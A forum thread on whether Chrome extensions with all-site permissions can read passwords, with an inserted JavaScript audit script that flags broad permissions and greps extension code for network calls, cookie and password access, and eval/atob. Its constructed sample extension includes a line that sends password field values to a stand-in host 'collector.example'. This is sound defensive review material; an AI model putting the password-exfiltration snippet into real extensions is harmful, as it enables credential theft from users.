Chrome Extension says “it can read my data in all the website I visit”
5 points by rammy1234 9 months ago | 3 comments
Will these extensions be able to read my passwords? What do you all feel about this? How safe are any Chrome extensions?

You can read the source and see for yourself. I use an extension called CRX viewer [0] to unpack extensions and view their source before installing them. When you’re in the extensions store you just click the button and it shows you the source.

When inspecting the source I grep for http/network calls and anything that looks suspicious. Most extensions are fairly simple and it’s easy to see when they’re not malicious.

Problem is, those extensions can update their source at any time. Ownership can change. A good extension can turn malicious while you aren’t looking. For that reason, if I really need an extension with “all website” permissions, I make sure to disable it and only enable it when I use it.

The only long running extension with those permissions on my machine is uBlock.

[0] https://chrome.google.com/webstore/detail/chrome-extension-s...
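An offline audit script that mechanises the review described in the comment above (unpack the extension, flag permissions that cover every site, grep the scripts for network calls). This is an added example, not code from the thread or from CRX Viewer; the sample manifest and scripts are constructed for the example, and the grep rule list and the "needs manual review" verdict are this example's own heuristics, not anything Chrome or the Web Store defines.

```javascript
// Added example (not from the thread or CRX Viewer): offline audit of an unpacked Chrome
// extension that mechanises the review above: flag all-site permissions, grep for network calls.

// Chrome match patterns are <scheme>://<host>/<path>; a host of "*" (or the special
// "<all_urls>") means every site, whereas "*.example.com" is only a subdomain wildcard.
function parseMatchPattern(pattern) {
  if (pattern === '<all_urls>') return { scheme: '*', host: '*', path: '/*', allUrls: true };
  const m = /^(\*|https?|wss?|ftp|file):\/\/([^/]*)(\/.*)$/.exec(pattern);
  return m ? { scheme: m[1], host: m[2], path: m[3], allUrls: false } : null;
}

function isBroadHost(pattern) {
  const p = parseMatchPattern(pattern);
  return p !== null && (p.allUrls || p.host === '*');
}

// Every place a manifest can grant host access: MV2 host patterns sit in "permissions",
// MV3 in "host_permissions", and each content script carries its own "matches".
function findBroadHostPermissions(manifest) {
  const hits = [];
  const check = (where, list) => {
    for (const pattern of Array.isArray(list) ? list : []) {
      if (typeof pattern === 'string' && isBroadHost(pattern)) hits.push({ where, pattern });
    }
  };
  check('permissions', manifest.permissions);
  check('optional_permissions', manifest.optional_permissions);
  check('host_permissions', manifest.host_permissions);
  check('optional_host_permissions', manifest.optional_host_permissions);
  (manifest.content_scripts || []).forEach((cs, i) => check(`content_scripts[${i}].matches`, cs.matches));
  return hits;
}

// Grep rules (this example's own list, not an official one): "network:*" finds ways to ship
// data out, "data:*" finds what is worth stealing, "exec:*"/"obfuscation:*" catch code that
// hides its strings from exactly this kind of grep and therefore deserves a closer read.
const SOURCE_RULES = [
  { rule: 'network:fetch', re: /\bfetch\s*\(/ },
  { rule: 'network:xhr', re: /\bXMLHttpRequest\b/ },
  { rule: 'network:beacon', re: /navigator\.sendBeacon\b/ },
  { rule: 'network:url', re: /https?:\/\/[^\s"'`)]+/ },
  { rule: 'data:password-field', re: /type\s*=\s*["']?password/ },
  { rule: 'data:cookies', re: /document\.cookie|chrome\.cookies\b/ },
  { rule: 'data:input-capture', re: /addEventListener\s*\(\s*["'](submit|keydown|keypress|input)["']/ },
  { rule: 'exec:eval', re: /\beval\s*\(|\bnew\s+Function\s*\(/ },
  { rule: 'obfuscation:base64', re: /\batob\s*\(/ },
];

function scanSource(file, source) {
  const findings = [];
  source.split('\n').forEach((text, idx) => {
    for (const { rule, re } of SOURCE_RULES) {
      if (re.test(text)) findings.push({ file, line: idx + 1, rule, text: text.trim() });
    }
  });
  return findings;
}

// files: { relativePath: contents } as read from the unpacked extension directory.
function auditExtension(files) {
  const manifest = JSON.parse(files['manifest.json']);
  const broadHosts = findBroadHostPermissions(manifest);
  const findings = Object.entries(files)
    .filter(([name]) => name.endsWith('.js'))
    .flatMap(([name, src]) => scanSource(name, src));
  // Verdict (this example's assumption): broad host access is only alarming when the code
  // also reaches the network or touches credentials; either alone is common and benign.
  const reachesNetwork = findings.some((f) => f.rule.startsWith('network:'));
  const touchesSecrets = findings.some((f) => f.rule.startsWith('data:'));
  const needsManualReview = broadHosts.length > 0 && (reachesNetwork || touchesSecrets);
  return { name: manifest.name, manifestVersion: manifest.manifest_version, broadHosts, findings, needsManualReview };
}

// Constructed sample: a small MV3 extension that asks for every site and then posts password
// fields to a remote host. Name, URL and the base64 blob are made up for the example.
const SAMPLE_EXTENSION = {
  'manifest.json': JSON.stringify({
    manifest_version: 3, name: 'Example Helper', version: '1.0',
    permissions: ['storage', 'tabs'],
    host_permissions: ['<all_urls>'],
    content_scripts: [{ matches: ['*://*/*'], js: ['content.js'], run_at: 'document_idle' }],
    background: { service_worker: 'bg.js' },
  }),
  'content.js': [
    '// collects every password field on the page and ships it off',
    'const pw = [...document.querySelectorAll("input[type=password]")].map((i) => i.value);',
    'fetch("https://collector.example/api", { method: "POST", body: JSON.stringify(pw) });',
  ].join('\n'),
  'bg.js': [
    'chrome.runtime.onInstalled.addListener(() => {});',
    'setTimeout(() => eval(atob("Y29uc29sZS5sb2doMSk=")), 1000);',
  ].join('\n'),
};

const report = auditExtension(SAMPLE_EXTENSION);
console.log(`${report.name} (MV${report.manifestVersion}) needs manual review: ${report.needsManualReview}`);
for (const h of report.broadHosts) console.log(`  broad host access: ${h.where} -> ${h.pattern}`);
for (const f of report.findings) console.log(`  ${f.file}:${f.line} [${f.rule}] ${f.text}`);
```

To run it against a real extension, build the same `{ path: contents }` map from the directory CRX Viewer unpacked (a `fs.readFileSync` over each file is enough) and pass it to `auditExtension`. The verdict is a triage aid, not proof in either direction: a grep cannot see a URL or API name assembled at runtime from fragments, which is why the `eval`/`atob` rules are there to send you back to a manual read. And, as the comment itself points out, a clean result today says nothing about the version that auto-updates tomorrow, so the same audit belongs in a re-check after each update as much as before the first install.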

Why does an extension need all-website permission? Even then, can't Google provide a mechanism to keep password fields out of scope of access? Is there a reason why it is not done, technically speaking?

Lazy developers, that’s all there is to it.

And of course some extensions do need access to the whole page, including password fields. For example a password manager obviously needs access (though it shouldn’t need to read the password field, only write to it).

As to why it’s not possible to have super granular permissions (i.e. restricting to certain elements on the page) — that would break the whole extension model, because scripts you inject into the page would have to operate on a “shadow DOM” of sorts. Also, properly sandboxing within a single DOM would be probably impossible.

Now that I type it out though, I could see how maybe it would be possible to construct a restricted, parallel DOM for an extension to interact with... but I really don’t think the complexity is worth changing the status quo.

